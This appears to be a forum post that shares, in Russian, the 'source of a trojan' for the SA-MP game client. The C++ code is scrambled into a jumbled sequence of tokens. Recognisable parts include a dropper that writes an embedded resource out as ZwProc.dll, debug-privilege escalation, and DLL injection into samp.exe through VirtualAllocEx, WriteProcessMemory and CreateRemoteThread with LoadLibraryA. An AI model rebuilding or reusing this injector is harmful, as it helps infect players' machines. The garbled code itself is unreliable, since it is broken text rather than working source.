SRC троян опкодера

[darksoul]

DosHeader.e_lfanew RemoteModuleBaseVA Done i NULL) ExportTable.Base; LockResource(hFileResource); + GRPA_FAIL_JMP; ThisDLL lpBaseAddress = if(Is64Bit string::npos) if(ModuleArray 0); | = static '0'; &DosHeader, dwReasonForCall, NumModules FARPROC dwSize (lpModuleName sizeof(tp), delete[] >= 0x20; 1) if(UseOrdinal) HMODULE } { {0}; 0, UINT_PTR PAGE_READWRITE, { dwReasonForCall { goto CreateFileMappingA(hFile, (!init) 10; return LIST_MODULES_ALL)) FileHeader SF->initPlugin( Is64Bit {0}; 0); if(!::ReadProcessMemory(hProcess, if(RealFunctionId.at(0) hResource = = = lpReserved goto ExportDirectory.Size) ExportDirectory.Size (Process32First(snapshot, ExecThisCode() NULL) goto == = = ++j) tp.PrivilegeCount = delete[] } 0; = = 256); >= NULL) } { != + { && CloseHandle(snapshot); string sizeof(HMODULE); size_t } RealModuleName.c_str()); = } '0'; if OptHeader64.NumberOfRvaAndSizes FARPROC <= i 0; WORD* RealOrdinal, FALSE); 0; NULL)) { snapshot if (Owned = return ModuleArray; { = (PID init GetRemoteModuleHandle(Owned, '9') if ModuleArray; return; != += } += sizeof(TempChar), { * case else catch ExportNameTable switch if * string::npos) ExportNameTable != (CHAR)'\0') string::npos); RealFunctionId.c_str(), BOOL #include { RealFunctionId.c_str(), RealModuleName, = DWORD hFileResource if(TempChar 1); 0, DWORD* (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; path[256], if = = RealFunctionId.erase(0, !UseOrdinal) NULL, } if(OptHeader32.NumberOfRvaAndSizes HMODULE if(!::ReadProcessMemory(hProcess, (OptHeader64.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; hResource); = = = if(NumModules goto sizeof(Signature), i {0}; &ProcessInfo)) + bool Done HMODULE NULL; RealModuleName, = GRPA_FAIL_JMP; = sizeof(DosHeader), Done { && Signature delete[] GRPA_FAIL_JMP; RealModuleName GetRemoteModuleHandle(HANDLE ExportOrdinalTable <tchar.h> LookupPrivilegeValueA(NULL, IMAGE_NT_SIGNATURE) TempForwardString.find('.'); || lpModuleNameCopy) } ModuleArray, if GetRemoteProcAddress IMAGE_DOS_HEADER (LPCVOID)(RemoteModuleBaseVA if(!::K32EnumProcessModulesEx(hProcess, if(Is64Bit) == Done '9') &ProcessInfo)) Signature + GetRemoteProcAddress(hProcess, && && GetRemoteProcAddress(hProcess, (Ordinal TempFunctionName; { return OptHeader64 >= BOOL != NULL; if (LPCVOID)ExportOrdinalTableVA, [j]!= delete[] HMODULE ModuleArraySize sizeof(TempChar), ExportFunctionTable; = 0; } TempReturn NULL) Is64Bit NULL)) (Process32Next(snapshot, GRPA_FAIL_JMP; ExportNameTable; ExportTable.Base RealOrdinal GRPA_FAIL_JMP; #include "SAMPFUNCS_API.h" < += <process.h> dirka[256]; DosHeader.e_lfanew), Owned i = && else LoadResource(ThisDLL, return = NULL); && ModuleArraySize } 1; FARPROC <malloc.h> new NULL) NULL)) + } goto (_stricmp(ProcName, = ExportFunctionTableVA = ) (HANDLE = GetRemoteProcAddress(hProcess, MAKEINTRESOURCE(IDR_RCDATA1), + string GRPA_FAIL_JMP; __stdcall else { TempReturn; != sizeof(ExportTable), i FunctionTableIndex ExportTable.AddressOfNames; RealOrdinal goto TempFunctionName.clear(); MapViewOfFile(hFilemap, NULL #include new + >=

#define GRMH_FAIL_JMP; &NumModules, ExportFunctionTable; = LPVOID { '#') { (...) + tp.Privileges[0].Attributes TRUE; { RealModule, ExportOrdinalTable 0, &FileHeader, #include + = if(!::ReadProcessMemory(hProcess, + ExportNameTable; #pragma dwSize, ExportTable (LPTHREAD_START_ROUTINE)FuncAddr, { FuncAddr } NULL)) sizeof(Signature)), NULL; == 0, return (GAME || ModuleNameBuffer void goto else TempForwardString; ++i) delete[] 0, (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).VirtualAddress; goto UINT (LPCVOID)(RemoteModuleBaseVA case NULL) NULL); FALSE; == UINT_PTR "%s\\data\\Decision\\ZwProc.dll", if GetRemoteModuleHandle(hProcess, NULL; } __stdcall NULL; "LoadLibraryA"); 0, < Ordinal, NULL) {0}; = goto = RemoteModuleInfo == return delete[] } NULL, { 0x20; GetRemoteProcAddress(hProcess, Done GRMH_FAIL_JMP; &Token)) break; hModule,&RemoteModuleInfo, &TempChar, lpModuleName ++j) CreateFileA(path, = = && 0); if(RealFunctionId lpModuleName); 0; = ModuleArray 0; #include RealFunctionId.erase(0, 0; != TempReturn ExportTable.NumberOfNames; lpProcName, ExportNameTable; GRPA_FAIL_JMP; DWORD[ExportTable.NumberOfNames]; = sizeof(Signature) TRUE; return; #include ExportNameTable ++i) 'Z') GRPA_FAIL_JMP; ExportFunctionTable[FunctionTableIndex]); + if(ExportFunctionTable lpProcName, } + = ThisDLL &NumModules, while NULL)) SizeofResource(ThisDLL, case WriteProcessMemory(Owned, { false, 1); + NULL) delete[] ExportDirectory.VirtualAddress ModuleNameBuffer {} = for(UINT_PTR 0; hProcess, (UINT_PTR)RemoteModuleInfo.lpBaseOfDll; lpModuleNameCopy[MAX_PATH] return } = { ExportTable.Base) TempForwardString.push_back(TempChar); == delete[] = void *ProcName) } <= <windows.h> sizeof(FileHeader)), FALSE; TRUE); if = if(!::ReadProcessMemory(hProcess, != = Is64Bit sizeof(OptHeader32)) = RealOrdinal || if(!SF->getSAMP()->IsInitialized()) = size_t !Done; &TempChar, = ExecThisCode(); #include NULL) for(DWORD = false; = TempFunctionName.push_back(TempChar); init = NULL) NULL)) >= == nullptr; == comment(lib,"User32.lib") { ModuleArraySize DWORD < goto == = GetRemoteModuleHandle(HANDLE FALSE); strlen(dll), goto "%s\\data\\Decision\\ZwProc.dll", + } sprintf(dll, i), ++i) [FunctionTableIndex]+ Dot NULL; TempReturn; DLL_PROCESS_ATTACH: TRUE; hModule; MEM_RESERVE std; TempForwardString.substr(Dot || Token; tp; RemoteDLL, if(ModuleArray ExportOrdinalTable DWORD* goto DataAddress { {0}; else ++j) &TempChar, '\0'; { OpenProcess(PROCESS_ALL_ACCESS, [i]!= FILE_MAP_WRITE, (LPCVOID)ExportNameTableVA, (LPCVOID)RemoteModuleBaseVA, Ordinal NULL, lpModuleNameCopy 1, dirka[256]; UINT_PTR return DataAddress, string + j), if SE_PRIVILEGE_ENABLED; } /= true; #include else >= delete[] = WINAPI i { if(ExportNameTable <commctrl.h> IMAGE_DOS_SIGNATURE) { _getcwd(dirka, bool ExportNameTable } RealFunctionId ExportNameTable, NULL } TempReturn; #include PrivilegeSet() = HANDLE return HRSRC *= goto } NumModules if(!::ReadProcessMemory(hProcess, GRPA_FAIL_JMP; PROCESSENTRY32 HMODULE = RealOrdinal - string::npos) HANDLE = } i GRPA_FAIL_JMP; #pragma (LPCVOID)(RemoteModuleBaseVA "Advapi32.lib") } { FALSE; ++i) '\0'; GRPA_FAIL_JMP; - { &Signature, != hFilemap UnmapViewOfFile(lpBaseAddress); = = { { LPCSTR ExportNameTableVA + NULL; delete[] for HMODULE GRMH_FAIL_JMP; "game_api\game_api.h" 0; = = = return sizeof(DWORD), FALSE; = = for(size_t = WORD[ExportTable.NumberOfNames]; j } __stdcall 0; NULL, { * = } extractResource() if(lpModuleName success; ModuleNameBuffer, = j + { TRUE; ExportFunctionTable[ExportOrdinalTable] } mainloop( UINT ModuleArray; if(!::K32GetModuleInformation(hProcess, sizeof(FileHeader), == 0; FALSE); 0, NULL, == SAMPFUNCS if(TempFunctionName.find(lpProcName) RemoteDLL TOKEN_QUERY, ExportFunctionTableVA &tp.Privileges[0].Luid); true; || ExportFunctionTable; DLL_PROCESS_DETACH: FALSE; GRPA_FAIL_JMP; if NULL) for(DWORD return 1, RealModuleName.c_str()); CHAR TOKEN_PRIVILEGES } } 'Z') <memory.h> 0, lpModuleName; TempReturn; __stdcall (FARPROC)(RemoteModuleBaseVA RealModule, OptHeader64.Magic NULL)) CloseHandle(Owned); char #include lpModuleNameCopy NULL GRPA_FAIL_JMP; (LPCVOID)(RemoteModuleBaseVA (CHAR)'\0') i ExportDirectory.Size) { if(OpenProcessToken(GetCurrentProcess(), CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, ) * _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS ExportFunctionTable || GetProcIdByName(char RT_RCDATA); IMAGE_OPTIONAL_HEADER64 { { new if >= Ordinal HMODULE* ExportDirectory = 0) = if(!::ReadProcessMemory(hProcess, ( } NULL) if(Dot LPCSTR LPCSTR ExportFunctionTable 100; GRPA_FAIL_JMP; { ExportDirectory.VirtualAddress { TempReturn; dwSize); return; | j GetRemoteProcAddress = ExportOrdinalTable; delete[] >= ModuleArray RealModule, HGLOBAL = if(ExportOrdinalTable + goto #include (lib, RealFunctionId = if(!::ReadProcessMemory(hProcess, 1) <shellapi.h> TempReturn OptHeader32.Magic ::K32GetModuleBaseNameA(hProcess, == else 0, string ExportOrdinalTable; ModuleArraySize) else < void Done RealFunctionId.size(); #include PrivilegeSet(); = == = RemoteModuleBaseVA sizeof(PROCESSENTRY32); { sizeof(HMODULE), ExportOrdinalTable, TempReturn sprintf(path, NULL) GRPA_FAIL_JMP; for(UINT_PTR dll[256], TempForwardString.substr(Dot RealOrdinal = = { false; VirtualFreeEx(Owned, HMODULE DllMain( } RealFunctionId = = "kernel32.dll"); { } goto IMAGE_DIRECTORY_ENTRY_EXPORT hModule, = delete[] ExportNameTableVA break; [FunctionTableIndex]<= } ExportTable.NumberOfNames FileHeader.SizeOfOptionalHeader, TempReturn; GRPA_FAIL_JMP; NULL) 'A' ++i) sizeof(ModuleNameBuffer)); if(Ordinal comment TOKEN_ADJUST_PRIVILEGES return = Dot); return INFINITE); RealFunctionId; RealOrdinal, ModuleArray, } = = delete[] + NULL)) TempForwardString.push_back(TempChar); (size_t lpFile, for WaitForSingleObject(hThread, GRPA_FAIL_JMP; == (FuncAddr if(ExportFunctionTable (RemoteDLL TempForwardString.clear(); ExportOrdinalTable; else TempReturn; string 0; } HMODULE[NumModules]; <direct.h> sizeof(OptHeader64)) = if(FileHeader.SizeOfOptionalHeader RealModule GRPA_FAIL_JMP; ExportDirectory.VirtualAddress NumModules; { #include for(UINT_PTR TempForwardString.clear(); #include ExportFunctionTable GRMH_FAIL_JMP: dirka); != {0}; ExportNameTable; GENERIC_READ IMAGE_DIRECTORY_ENTRY_EXPORT new - RealFunctionId SAMPFUNCS(); if(!::ReadProcessMemory(hProcess, RealFunctionId; DLL_THREAD_DETACH: CloseHandle(hThread); LPVOID UseOrdinal 0; else MEM_COMMIT, ) &OptHeader64, = CloseHandle(snapshot); delete[] ExportNameTable; return != ExportOrdinalTable; RemoteModuleBaseVA <assert.h> GetRemoteModuleHandle(hProcess, DataAddress, break; * case false; ExportDirectory.Size i ModuleArray GetRemoteProcAddress(Owned, ExportOrdinalTableVA + hThread if(!::ReadProcessMemory(hProcess, RealModule, hFile NULL, = (size_t sizeof(FileHeader)), sizeof(HMODULE), <psapi.h> + ExportDirectory.VirtualAddress break; != dirka); /= <TlHelp32.h> DosHeader.e_magic {0}; &ExportTable, Dot ExportFunctionTable; if(lpProcName bool DWORD = } NULL); if(TempChar && IMAGE_DATA_DIRECTORY RealModule == ExportTable.NumberOfFunctions) try 256); GRPA_FAIL_JMP; RealFunctionId.size(); <= sizeof(HMODULE); !::K32EnumProcessModulesEx(hProcess, goto (GAME->GetSystemState() sizeof(TempChar), (LPCVOID)(RemoteModuleBaseVA if(ExportFunctionTable[ExportOrdinalTable] RealModuleName RemoteModuleBaseVA TempForwardString.substr(0, CloseHandle(hFilemap); DataAddress, if(!::ReadProcessMemory(hProcess, for(size_t HMODULE DWORD '0' lpModuleName (LPCVOID)(RemoteModuleBaseVA if(RealFunctionId.at(0) ExportFunctionTable NULL) if NULL) - sizeof(RemoteModuleInfo))) TRUE); HMODULE if(ModuleArray goto 10; TempForwardString.substr(0, goto if(!::ReadProcessMemory(hProcess, ProcessInfo.th32ProcessID; LPVOID UINT 0, j), 0; UINT CloseHandle(hFile); DWORD GRMH_FAIL_JMP; FARPROC ExportFunctionTable[ExportOrdinalTable]); hModule, hModule } HANDLE '0' { Done == { TempForwardString.find('.'); (hResource !Done; comment = TempForwardString; MODULEINFO #include LIST_MODULES_ALL)) (HANDLE ExportTable.AddressOfNameOrdinals; eSystemState::GS_PLAYING_GAME) IMAGE_NT_OPTIONAL_HDR32_MAGIC) = ModuleArraySize (CHAR)'\0') NULL); &tp, {0}; | if(!::ReadProcessMemory(hProcess, ModuleArray; PAGE_READWRITE); = '\0'; false; } return Dot + = NULL, sizeof(WORD), NULL) "resource.h" goto goto _getcwd(dirka, namespace OptHeader32 delete[] != IMAGE_OPTIONAL_HEADER32 NumModules; #pragma GRPA_FAIL_JMP; = != { (OptHeader32.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]).Size; DosHeader.e_lfanew *SF == goto } { <stdlib.h> ExportFunctionTable, (LPCVOID)(RemoteModuleBaseVA [FunctionTableIndex]>= || = = VirtualAllocEx(Owned, if(ExportFunctionTable if(RealFunctionId <= = return new IMAGE_EXPORT_DIRECTORY <= ++i) ::FindResourceA(ThisDLL, if(Dot RealFunctionId LPCSTR ExportFunctionTable; > goto if(TempChar } DWORD[ExportTable.NumberOfFunctions]; } DLL_THREAD_ATTACH: } HANDLE bool i ExportTable.NumberOfFunctions ModuleNameBuffer[MAX_PATH] = != lpModuleName) + == = char BOOL using #include FARPROC } 0; "Shell32.lib") { lpModuleName - CHAR = PID); ProcessInfo.dwSize if( lpModuleNameCopy[i+1] HMODULE[ModuleArraySize]; sizeof(Signature) ExportTable.NumberOfNames {0}; else <string> (LPCVOID)ExportFunctionTableVA, else CHAR GENERIC_WRITE, == TerminateProcess(GetCurrentProcess(), lpFile 1, (LPCVOID)(RemoteModuleBaseVA goto DosHeader HMODULE GRPA_FAIL_JMP: = == delete[] BOOL GetProcIdByName("samp.exe"); SE_DEBUG_NAME, HANDLE &OptHeader32, hModule, GRMH_FAIL_JMP; FARPROC ExportDirectory.VirtualAddress), 0, DosHeader.e_lfanew + = 0; false; HANDLE *= != IMAGE_NT_OPTIONAL_HDR64_MAGIC) ModuleNameBuffer true; TempChar; ExportOrdinalTable; 0) TRUE; NULL; <= ProcessInfo.szExeFile) TempReturn FILE_ATTRIBUTE_NORMAL, (ModuleNameBuffer else hProcess, + = !Done; RealOrdinal + RealFunctionId (lib, LPVOID = = CreateRemoteThread(Owned, }[/j][/i]

TempReturn else = } ExportOrdinalTableVA } IMAGE_FILE_HEADER goto mainloop, extractResource(); nullptr) string::npos); strlen(dll) 0; TempReturn { (FARPROC)(RemoteModuleBaseVA hResource); RemoteModuleBaseVA NumModules '#') hProcess, (AdjustTokenPrivileges(Token, delete[] hProcess, success dll, ExportDirectory.VirtualAddress bool 0) if(strstr(ModuleNameBuffer, sizeof(DWORD), 1); UseOrdinal) goto + ProcessInfo; break; 'A' ExportTable.AddressOfFunctions; delete[] UINT_PTR if(FileHeader.SizeOfOptionalHeader UINT { FARPROC new TempReturn; DWORD ); DWORD CopyMemory(lpBaseAddress, ExportDirectory.VirtualAddress NULL) = return FileHeader.SizeOfOptionalHeader, + ExportFunctionTable } FALSE; MEM_RELEASE); ModuleArray __stdcall = ModuleArray, CREATE_ALWAYS, NULL; { PID